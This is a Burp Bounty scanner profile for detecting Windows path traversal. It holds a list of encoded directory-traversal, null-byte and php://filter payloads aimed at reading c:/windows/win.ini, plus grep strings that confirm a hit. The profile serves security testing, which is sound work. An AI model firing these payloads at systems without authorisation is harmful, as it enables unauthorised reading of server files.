[
  {
    "ProfileName": "PathTraversal_Windows",
    "Name": "",
    "Enabled": true,
    "Scanner": 1,
    "Author": "@burpbounty",
    "Payloads": [
      "true,/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini",
      "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini",
      "true,/./././././././././././windows/win.ini",
      "true,/../../../../../../../../../../../windows/win.ini",
      "true,/..\\../..\\../..\\../..\\../..\\../..\\../windows/win.ini",
      "true,/.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./windows/win.ini",
      "true,..//..//..//..//..//windows//win.ini",
      "true,../../../../../../../../../../../../windows/win.ini",
      "true,../../windows/win.ini",
      "true,..\\../..\\../..\\../..\\../windows/win.ini",
      "true,..\\../..\\../windows/win.ini",
      "true,..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini",
      "true,\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini",
      "true,/../../../../../../../../../../../windows/win.ini%00",
      "true,../../../../../../../../../../../../windows/win.ini%00",
      "true,..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini%00",
      "true,/../../../../../../../../../../../windows/win.ini%00.html",
      "true,/../../../../../../../../../../../windows/win.ini%00.jpg",
      "true,..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../windows/win.ini",
      "true,../../../../../../../../windows/win.ini",
      "true,..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini",
      "true,c:\\windows\\win.ini",
      "true,c:/windows/win.ini",
      "true,php://filter/zlib.deflate/convert.base64-encode/resource\u003dc:/windows/win.ini",
      "true,php://filter/zlib.deflate/convert.base64-encode/resource\u003dc:\\windows\\win.ini"
    ],
    "Encoder": [],
    "UrlEncode": false,
    "CharsToUrlEncode": "",
    "Grep": [
      "true,,for 16-bit app support",
      "true,Or,[fonts]"
    ],
    "Tags": [
      "All",
      "Path Traversal"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "",
    "TimeOut2": "",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": true,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "isHeaderValue": false,
    "sequence": false,
    "NewHeaders": [],
    "MatchType": 1,
    "Scope": 0,
    "RedirType": 4,
    "MaxRedir": 3,
    "requestType": 1,
    "rawRequest": "",
    "payloadPosition": 1,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "PathTraversal_Windows",
    "IssueSeverity": "High",
    "IssueConfidence": "Certain",
    "IssueDetail": "https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt\u003cbr/\u003e\u003cbr/\u003e\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal\u003cbr/\u003e\u003cbr/\u003e\nhttps://github.com/soffensive/windowsblindread\n\n\u003cbr/\u003e\u003cbr/\u003e- PAYLOAD: \u003cbr/\u003e\u003cpayload\u003e\n\u003cbr/\u003e\u003cbr/\u003e\n- GREP: \u003cbr/\u003e\u003cgrep\u003e",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [],
    "VariationAttributes": [],
    "InsertionPointType": [
      18,
      65,
      70,
      80,
      1,
      2,
      6,
      33,
      5,
      35,
      34,
      64,
      0,
      3,
      4,
      37,
      21,
      31,
      41,
      51,
      61,
      71,
      72,
      73,
      74,
      75,
      76,
      77,
      36,
      81,
      82
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false,
    "changeHttpRequest": false,
    "showIssue": false,
    "changeHttpRequestType": 1
  }
]